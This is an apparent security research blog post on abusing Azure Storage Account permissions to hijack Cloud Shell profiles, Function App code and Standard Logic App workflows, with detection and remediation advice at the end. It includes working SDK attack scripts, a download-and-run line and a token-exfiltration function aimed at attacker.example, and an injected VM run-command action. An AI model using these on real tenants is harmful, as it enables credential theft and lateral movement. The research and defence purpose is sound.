
Not the Access You Asked For: How Azure Storage Account Read/Write Permissions Can Be Abused for Privilege Escalation and Lateral Movement

Updated: Jun 25

TL;DR In this blog we will dive into some unexpected techniques that allow an Azure user with Storage Account permissions to abuse them for privilege escalation and lateral movement. We will discuss prior work on abusing storage access against Azure Cloud Shell and Azure Function App, and share a new technique targeting Azure Standard Logic Apps.


by: Tamir Yehuda (Tamirye94), Hai Vaknin (vakninhai)


 

Azure Storage Accounts 101

Azure Storage Accounts are Microsoft’s take on a cloud storage service, aiming to provide pay-as-you-go storage for various use cases:


Blob Storage is designed for storing large amounts of unstructured data, such as text, images or binary data.

File Shares is a managed file share service for cloud or on-premises deployments. It operates through the standard SMB (Server Message Block) protocol and can be mounted concurrently by cloud and on-premises machines.

Queues store and manage large volumes of messages. This service is useful for messaging within and between services.

Tables provide storage for structured NoSQL data.


In this blog we are going to focus on the first two storage types — Blob Storage & File Shares.


Access to a Storage Account can be granted using the following methods (a short code sketch of all three follows the list):


Shared Access Signatures (SAS) — SAS tokens provide secure delegated access to resources in a Storage Account without exposing the account access keys. A SAS token is a string containing a signature that grants permissions to a specific resource for a given time period.

Access Keys — Each Azure Storage Account has two keys (key1 and key2), which are used for authentication and access. These keys provide full access to the Storage Account, which is why handling and rotation of these keys must be done with care.

Role-Based Access Control (RBAC) — RBAC allows granting users, groups, or applications access to various resources in a Storage Account using Microsoft Entra ID (formerly Azure Active Directory) roles. This method is preferred by enterprises seeking to implement the principle of least privilege.
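As a rough sketch (using the Python SDK, with placeholder account, container and blob names that are not from any real environment), the three access methods look something like this:

from datetime import datetime, timedelta, timezone

from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobSasPermissions, BlobServiceClient, generate_blob_sas

ACCOUNT_NAME = "mystorageaccount"      # placeholder
ACCOUNT_URL = f"https://{ACCOUNT_NAME}.blob.core.windows.net"
ACCOUNT_KEY = "<key1>"                 # placeholder access key

# 1. Access key: full access to the account's data plane
svc_with_key = BlobServiceClient(account_url=ACCOUNT_URL, credential=ACCOUNT_KEY)

# 2. SAS: a time-boxed, signed token scoped (here) to a single blob
sas_token = generate_blob_sas(
    account_name=ACCOUNT_NAME,
    container_name="backups",
    blob_name="report.csv",
    account_key=ACCOUNT_KEY,
    permission=BlobSasPermissions(read=True),
    expiry=datetime.now(timezone.utc) + timedelta(hours=1),
)
blob_url_with_sas = f"{ACCOUNT_URL}/backups/report.csv?{sas_token}"

# 3. RBAC: authenticate with a Microsoft Entra ID identity; access is governed by role assignments
svc_with_rbac = BlobServiceClient(account_url=ACCOUNT_URL, credential=DefaultAzureCredential())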


You can read more about Azure Storage Accounts here.


 

The Mind-Blowing Moment

While reading the highly recommended book “Penetration Testing Azure for Ethical Hackers” by Karl Fosaaen and David Okeyode, we were introduced to a cool technique: using Azure Storage Account access, attackers can escalate privileges via Azure Cloud Shell. This technique blew our minds and got us thinking: which other common Azure services rely on Azure Storage and can be abused in the same way?


Azure Cloud Shell Storage Account Privilege Escalation Breakdown


Azure Cloud Shell is an interactive, authenticated, browser-accessible shell for managing Azure resources. It provides an in-browser terminal interface using either Bash or PowerShell.


Running the Get-AzStorageAccount command from a PowerShell terminal on Azure Cloud Shell


Running the az logicapp list command from a Bash terminal on Azure Cloud Shell


Behind the scenes, each time a user asks for a new instance of Cloud Shell, a Linux container is spawned. For Cloud Shell to have persistent storage, users are prompted to create a new Storage Account when first opening a Cloud Shell. The Storage Account can be created either automatically by Azure or manually by the user. When created automatically, the Storage Account’s name starts with a “cs” prefix. Regardless of the creation method, all Cloud Shell File Shares are named in the following format: cs-<user-name>-<random-string>.
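As an illustration, here is a small sketch (Python SDK, placeholder connection string) of how shares following this naming convention can be enumerated:

from azure.storage.fileshare import ShareServiceClient

# Placeholder connection string for the Storage Account that holds Cloud Shell data
service = ShareServiceClient.from_connection_string("<storage-account-connection-string>")

# Cloud Shell File Shares follow the cs-<user-name>-<random-string> pattern
for share in service.list_shares():
    if share.name.startswith("cs-"):
        print(share.name)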


Cloud Shell File Share


Inside the File Share, an EXT2 filesystem image is created to store the user’s Cloud Shell files and configuration. The filesystem is attached to the Cloud Shell container that is spawned any time the user initiates a new Cloud Shell session.


If an attacker is able to gain access to a user that has Read & Write permissions (MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/WRITE and MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/READ) to a File Share which contains a higher-privileged user’s Cloud Shell EXT2 filesystem image, then the attacker will be able to:


– download the filesystem image;

– mount it on a Linux/macOS machine or WSL;

– edit the .bashrc and .Microsoft.PowerShell_profile.ps1 shell profile configuration files, appending malicious code to them;

– and re-upload the modified image, overwriting the existing one.


The next time the victim starts a Cloud Shell session, the modified Bash or PowerShell profile is loaded and the malicious code it contains is executed in the context of the privileged user.
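A minimal sketch of these steps, assuming a hypothetical share name and image path (Python SDK plus standard Linux tooling; the exact file layout may differ between environments):

import subprocess

from azure.storage.fileshare import ShareFileClient

CONN_STR = "<storage-account-connection-string>"    # placeholder
SHARE = "cs-victim-user-abc123"                     # hypothetical Cloud Shell File Share
IMAGE_PATH = ".cloudconsole/acc_victim.img"         # hypothetical path of the EXT2 image inside the share

file_client = ShareFileClient.from_connection_string(CONN_STR, share_name=SHARE, file_path=IMAGE_PATH)

# 1. Download the victim's EXT2 filesystem image
with open("acc_victim.img", "wb") as image:
    image.write(file_client.download_file().readall())

# 2. Mount the image locally (Linux/WSL) and append a payload to the Bash profile
#    (the PowerShell profile can be modified in the same way)
subprocess.run(["sudo", "mkdir", "-p", "/mnt/cs"], check=True)
subprocess.run(["sudo", "mount", "-o", "loop", "acc_victim.img", "/mnt/cs"], check=True)
subprocess.run(["sudo", "tee", "-a", "/mnt/cs/.bashrc"],
               input='\ncurl -s https://attacker.example/payload | sh\n', text=True, check=True)
subprocess.run(["sudo", "umount", "/mnt/cs"], check=True)

# 3. Re-upload the modified image, overwriting the original in the File Share
with open("acc_victim.img", "rb") as image:
    file_client.upload_file(image)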


Cloud Shell Attack Overview


 

Setting Our Scope

We decided to go over all Azure services, noting which ones use Storage Accounts by default and could be good candidates for abuse. After some experimentation, we marked the following two services:


– Azure Function App

– Azure Standard Logic App


 

Azure Function App — Going to a Place Where Some Have Been Before

When we started looking into Azure Function App, we found two highly useful blog posts by Orca Security’s Roi Nisimi [blog] and Rogier Dijkman [blog]. In those posts, Nisimi and Dijkman discuss similar techniques to abuse access to a Function App’s Storage Account in order to take over the Function App’s functions for privilege escalation or lateral movement.


Azure Function App Storage Account Privilege Escalation & Lateral Movement Breakdown


Azure Function App is a serverless computing platform that enables developers to build and deploy event-driven functions. To allow the functions to perform actions on Azure resources, it is a common practice to assign a managed identity with the required permissions to the Function App.


When an Azure Function App is deployed, the Function App configuration files, as well as the code of functions inside the Function App, are stored in a Storage Account using the File Share storage.


To prevent unauthorized users from triggering functions, each Function App is created with application keys. When a new function is created inside the Azure Function App, its authorization level determines whether an application key is required to trigger it, and whether a key unique to that specific function or the master key of the Azure Function App is used.



The application keys are stored in Blob Storage in the same Storage Account used for the Azure Function App code & configurations.


Attackers with Read & Write permissions (MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/WRITE and MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/READ) to the Storage Account in which the File Share with the function code is stored, but without permissions to the Function App itself, can edit the Function App configuration and the code of the various functions. By adding malicious code, attackers can steal the managed identity credentials or make the function perform actions on their behalf.
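As an example, here is a sketch of overwriting a Python HTTP-triggered function through the content File Share. The share name, function name and paths are hypothetical; the real layout depends on the app:

from azure.storage.fileshare import ShareFileClient

CONN_STR = "<storage-account-connection-string>"     # placeholder
SHARE = "victim-func-app-content"                    # hypothetical content share (WEBSITE_CONTENTSHARE)
TARGET = "site/wwwroot/HttpTrigger1/__init__.py"     # hypothetical Python HTTP-triggered function

malicious_code = '''import os
import urllib.request
import azure.functions as func

def main(req: func.HttpRequest) -> func.HttpResponse:
    # Leak the managed identity token endpoint variables to an attacker-controlled host
    leak = os.environ.get("IDENTITY_ENDPOINT", "") + " " + os.environ.get("IDENTITY_HEADER", "")
    urllib.request.urlopen("https://attacker.example/", data=leak.encode())
    return func.HttpResponse("ok")
'''

client = ShareFileClient.from_connection_string(CONN_STR, share_name=SHARE, file_path=TARGET)
client.upload_file(malicious_code.encode())   # overwrites the original function code in the File Share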


Function App Attack Overview


Attackers may have to wait for the function to be triggered externally when their current permissions do not allow them to trigger it themselves. However, if the attackers gain access to a user with both Blob Storage Read & Write permissions (MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/WRITE and MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/READ) and the File Share permissions, they won’t be required to wait for external triggering. With these permissions, they can modify or steal the application keys and trigger the function themselves.
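Under default settings the keys live in a container named azure-webjobs-secrets in that same Storage Account. A sketch of listing them (the app name is hypothetical, and depending on configuration the stored values may be encrypted):

from azure.storage.blob import ContainerClient

CONN_STR = "<storage-account-connection-string>"   # placeholder

# The Functions runtime keeps host and function keys under this container by default
container = ContainerClient.from_connection_string(CONN_STR, container_name="azure-webjobs-secrets")

# Hypothetical app name; each app gets its own folder of host.json / <function>.json secrets
for blob in container.list_blobs(name_starts_with="victim-func-app/"):
    print(blob.name)
    print(container.download_blob(blob.name).readall().decode())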


 

Azure Standard Logic App

Azure Logic App is a service that allows users to design and build automated workflows to integrate apps, data, services and systems. It offers a visual designer that simplifies the process of creating complex workflows through a drag-and-drop interface, enabling the automation of business processes without the need for extensive coding.


Looking into Azure Logic Apps we noticed they have two hosting models — Consumption & Standard.


In the Consumption model, the Logic App operates within a multi-tenant environment that is fully managed by Azure, and the user does not have access to the underlying Storage Account. In the Standard model, a Storage Account is created in conjunction with the Logic App, which then stores the workflows and secrets of the Logic App.


The more we dug into Azure Standard Logic Apps, the more it became apparent that they are based on Azure App Service and are an extension of Azure Function App. This can be seen in the host.json configuration file of a Standard Logic App:
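A typical host.json of a Standard Logic App (reconstructed here as an approximation, not the exact file from our environment) loads the workflow engine as an extension bundle on top of the Functions runtime:

{
  "version": "2.0",
  "extensionBundle": {
    "id": "Microsoft.Azure.Functions.ExtensionBundle.Workflows",
    "version": "[1.*, 2.0.0)"
  }
}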



This instilled confidence in us that we could abuse Logic Apps as well.


An Azure Logic App workflow can be created either by editing a JSON file or through the visual designer:


Visual designer view


JSON code representation of the same workflow


The above example is a very simple case of a Logic App triggered by an HTTP trigger (a request sent to a specific URL), with a “hello world” response sent back to the triggering user.


This rudimentary example is only here to show how a Logic App workflow operates. Most workflows we encountered were much more complex and involved getting secrets from Azure Key Vaults, turning Azure VMs on or off, triggering Azure Functions, interacting with third-party services, or were triggered by Azure Sentinel Playbooks to auto-remediate security incidents.


In a similar way to Azure Function Apps, a Logic App stores its “code” (workflow.json) in a File Share and its secrets in Blob Storage.


In many cases, Azure Logic Apps are assigned a managed identity to allow the Logic App workflows to manage or access Azure resources.


Azure Logic App Storage Account Lateral Movement Breakdown


Attackers with Read & Write permissions (MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/WRITE and MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/READ) to the Storage Account in which the File Share with the Logic App workflows is stored can edit the “code” and subvert the workflow operation, running a malicious workflow in the context of the Logic App.


Standard App Attack Overview


Unlike Azure Function Apps or Cloud Shell, where exploitation might be more straightforward because running arbitrary code is easier, in the Logic App case the attackers need to understand the Logic App workflows and the different actions that are part of them. In some cases, the attackers can exfiltrate secrets, take over third-party connectors, trigger Azure Functions, run commands on Azure VMs, and in the most severe cases create users or escalate privileges.


Azure Standard Logic App Storage Account Attack Scenario


Let’s imagine the following scenario, which was not at all based on something we saw in a client environment during an engagement…


Suppose we have the following Standard Logic App, nice-logic-app, that manages a workflow named test. test is used for turning off VMs in the development environment inside the dev-app1 resource group in the dev-sub subscription.


To be able to perform this operation, nice-logic-app is assigned a managed identity with a Virtual Machine Contributor role on the whole subscription.



To simplify things, let’s assume there is one machine (shutdown-machine) that needs to be turned off, so the test workflow is set up in the following way:




Our attacker gains control over a user with permissions to Read & Write to Storage Account File Shares on the resource group where nice-logic-app is deployed. Our attacker is not interested in shutdown-machine but would really like access to victim-vm in the app1 resource group in the same subscription.


The attacker accesses the File Share (shown here through the Azure portal, but this can be done using the Azure CLI, PowerShell or the ARM API as well):



As the Logic App’s managed identity has permissions on this VM as well, our attacker adds the following action to the workflow.json:


 "HTTP": {
        "type": "Http",
        "inputs": {
          "headers": {
            "Content-Type": "application/json"
          },
          "body": {
            "commandId": "RunShellScript",
            "script": [
              "echo \"Gained $(whoami) access to this machine\" > /tmp/logic.txt"
            ]
          },
          "authentication": {
            "type": "ManagedServiceIdentity"
          },
          "uri": "https://management.azure.com/subscriptions/0xxxxe3-c81c-xxxx-bc0e-963xxxxxx478/resourceGroups/app1/providers/Microsoft.Compute/virtualMachines/victim-vm/runCommand?api-version=2024-03-01",
          "method": "POST"
        },
        "runAfter": {},
        "runtimeConfiguration": {
          "contentTransfer": {
            "transferMode": "Chunked"
          }
        }
      }

This action sends a POST request to the ARM API to run a command on the target VM in the context of the Logic App’s managed identity.


The malicious workflow will look like the following, after being edited:


{
  "definition": {
    "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
    "actions": {
      "Response": {
        "type": "Response",
        "kind": "Http",
        "inputs": {
          "statusCode": 200,
          "body": "Turned off all VMs in the development environment"
        },
        "runAfter": {
          "Power_off_virtual_machine": ["SUCCEEDED"]
        }
      },
      "Power_off_virtual_machine": {
        "type": "ApiConnection",
        "inputs": {
          "host": {
            "connection": {
              "referenceName": "azurevm"
            }
          },
          "method": "post",
          "path": "/subscriptions/@{encodeURIComponent('0xxxxe3-c81c-xxxx-bc0e-963xxxxxx478')}/resourcegroups/@{encodeURIComponent('dev-app1')}/providers/Microsoft.Compute/virtualMachines/@{encodeURIComponent('shutdown-machine')}/powerOff",
          "queries": {
            "api-version": "2019-12-01"
          }
        },
        "runAfter": {
          "HTTP": ["SUCCEEDED"]
        }
      },
      "HTTP": {
        "type": "Http",
        "inputs": {
          "headers": {
            "Content-Type": "application/json"
          },
          "body": {
            "commandId": "RunShellScript",
            "script": [
              "echo \"Gained $(whoami) access to this machine\" > /tmp/logic.txt"
            ]
          },
          "authentication": {
            "type": "ManagedServiceIdentity"
          },
          "uri": "https://management.azure.com/subscriptions/0xxxxe3-c81c-xxxx-bc0e-963xxxxxx478/resourceGroups/app1/providers/Microsoft.Compute/virtualMachines/victim-vm/runCommand?api-version=2024-03-01",
          "method": "POST"
        },
        "runAfter": {},
        "runtimeConfiguration": {
          "contentTransfer": {
            "transferMode": "Chunked"
          }
        }
      }
    },
    "contentVersion": "1.0.0.0",
    "outputs": {},
    "triggers": {
      "When_a_HTTP_request_is_received": {
        "type": "Request",
        "kind": "Http"
      }
    }
  },
  "kind": "Stateful"
}

After editing workflow.json, the attacker uploads it to the File Share and overwrites the existing workflow.
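A sketch of this read-edit-write round trip with the Python SDK (the share name and workflow path are hypothetical; Standard Logic Apps keep workflow definitions under site/wwwroot/<workflow-name>/workflow.json in their content share):

import json

from azure.storage.fileshare import ShareFileClient

CONN_STR = "<storage-account-connection-string>"      # placeholder
SHARE = "nice-logic-app-content"                      # hypothetical content share of the Logic App
WORKFLOW_PATH = "site/wwwroot/test/workflow.json"     # hypothetical path of the "test" workflow

client = ShareFileClient.from_connection_string(CONN_STR, share_name=SHARE, file_path=WORKFLOW_PATH)

# 1. Download the current workflow definition
workflow = json.loads(client.download_file().readall())

# 2. Inject the malicious HTTP action shown above
#    (malicious_http_action.json: that action saved locally, wrapped in enclosing { } so it parses as JSON)
with open("malicious_http_action.json") as f:
    workflow["definition"]["actions"].update(json.load(f))

# 3. Overwrite the existing workflow.json in the File Share
client.upload_file(json.dumps(workflow, indent=2).encode())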


Although the attacker does not have access to the Logic App itself, the changes to the workflow.json are reflected in the Logic App designer as well:



So when the workflow runs, the malicious command is executed on victim-vm:



 

Detection & Remediation

The attacks described above show how important it is to stick to the principle of least privilege. In many organizations, over-permissive access to Storage Accounts can lead to severe consequences.


As many organizations struggle with mapping their ever-growing Azure environment, we created a small script that helps cloud administrators locate all Storage Accounts susceptible to such attacks.


The script should be run by a user with at least Read privileges on all Storage Accounts in the Azure environment.


The script can be found here.
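For reference, here is a minimal sketch of the idea behind such a script (this is not the published script; it only illustrates one way to flag Cloud Shell, Function App and Standard Logic App Storage Accounts):

from azure.identity import DefaultAzureCredential
from azure.mgmt.resource import SubscriptionClient
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web import WebSiteManagementClient

cred = DefaultAzureCredential()

for sub in SubscriptionClient(cred).subscriptions.list():
    storage = StorageManagementClient(cred, sub.subscription_id)
    web = WebSiteManagementClient(cred, sub.subscription_id)

    # Automatically created Cloud Shell Storage Accounts start with a "cs" prefix
    cloud_shell_candidates = [a.name for a in storage.storage_accounts.list() if a.name.startswith("cs")]

    # Function Apps and Standard Logic Apps reference their backing Storage Account
    # through the AzureWebJobsStorage application setting
    backing_accounts = {}
    for site in web.web_apps.list():
        if "functionapp" not in (site.kind or ""):   # Standard Logic Apps report kind "functionapp,workflowapp"
            continue
        settings = web.web_apps.list_application_settings(site.resource_group, site.name)
        conn = settings.properties.get("AzureWebJobsStorage", "")
        account = next((part.split("=", 1)[1] for part in conn.split(";") if part.startswith("AccountName=")), None)
        backing_accounts[site.name] = account

    print(sub.subscription_id, cloud_shell_candidates, backing_accounts)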


Script Output


After identifying all the sensitive Storage Accounts, we recommend reviewing the access to each of them and revoking unneeded permissions. In addition, by enabling File Share & Blob Storage logs and forwarding them to a SIEM, access to these accounts can be monitored for suspicious activity.


Enabling logs on Storage Accounts can be done manually by accessing Diagnostic settings in the left pane of the Storage Account, or preferably via a script or Azure Policy.
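For example, a sketch of enabling blob read/write/delete logging to a Log Analytics workspace with the monitor SDK (all resource IDs are placeholders; the File Share service can be configured the same way against its fileServices/default resource):

from azure.identity import DefaultAzureCredential
from azure.mgmt.monitor import MonitorManagementClient
from azure.mgmt.monitor.models import DiagnosticSettingsResource, LogSettings

SUBSCRIPTION_ID = "<subscription-id>"    # placeholder
WORKSPACE_ID = "/subscriptions/<subscription-id>/resourceGroups/<rg>/providers/Microsoft.OperationalInsights/workspaces/<workspace>"
BLOB_SERVICE = "/subscriptions/<subscription-id>/resourceGroups/<rg>/providers/Microsoft.Storage/storageAccounts/<account>/blobServices/default"

client = MonitorManagementClient(DefaultAzureCredential(), SUBSCRIPTION_ID)

# Send blob data-plane read/write/delete logs to a Log Analytics workspace
client.diagnostic_settings.create_or_update(
    resource_uri=BLOB_SERVICE,
    name="storage-data-plane-logs",
    parameters=DiagnosticSettingsResource(
        workspace_id=WORKSPACE_ID,
        logs=[
            LogSettings(category="StorageRead", enabled=True),
            LogSettings(category="StorageWrite", enabled=True),
            LogSettings(category="StorageDelete", enabled=True),
        ],
    ),
)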


Storage Account with logs enabled


